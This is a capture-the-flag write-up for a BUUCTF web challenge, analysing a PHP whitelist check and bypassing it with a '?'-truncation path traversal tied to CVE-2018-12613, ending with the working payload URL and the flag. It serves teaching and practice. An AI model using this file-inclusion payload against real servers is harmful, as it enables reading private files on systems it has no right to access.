Subject address: https://buuoj.cn/challenges
Problem-solving ideas
The first step: Enter the topic, oncoming is a funny picture, press f12 to view, find the prompt: source.php
Step 2: Enter the php page given by the access prompt in the URL column
http://c0717382-8c47-4aa3-b308-1972e1173f7a.node3.buuoj.cn/source.php
Step 3: Check the prompts given on the source.php page
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
Step 4: Analyze the code
- First look at the main function
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
Extract the file parameter submitted by the page, and determine whether the file parameter is empty, whether it is a string, and whether it passes the checkFile function. If the three tests are passed, use the include function to insert the content specified by the file parameter into the current page . If it fails, print the funny picture you saw before.
Conclusion: Need to add ?file=xxx content in the URL bar. Where xxx points to the file where the flag is located, and must pass triple detection.
- Then check the checkFile function
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
The first if determines whether the content of xxx is empty or a string.
The second if determines whether the content of xxx contains the content in the whitelist.
After that, the content of xxx is truncated, from the beginning stage to? prior to.
The third if determines whether the truncated content contains the content in the whitelist.
After that, xxx is decoded and then truncated.
The fourth if performs the same function as the third if.
Conclusion: Need to construct ?file=source.php?/…/…/…/…/xxx, return true in the second if to pass the verification and then output xxx to the current page. Where xxx points to the page where the flag is located.
Using multiple.../is exploiting a loophole. Vulnerability address: phpmyadmin 4.8.1 remote file inclusion vulnerability (CVE-2018-12613)
Step 5: Determine where the flag is
In the fourth step, it is found that in addition to source.php, you can also access hint.php. Get the location of the flag after visiting hint.php.
Step 6: Obtain the flag
Enter in the URL field to
http://c0717382-8c47-4aa3-b308-1972e1173f7a.node3.buuoj.cn/source.php?file=hint.php?/../../../../../ffffllllaaaagggg
get the flag: c4f4e88f-69c5-487a-8168-3c8c187d080a
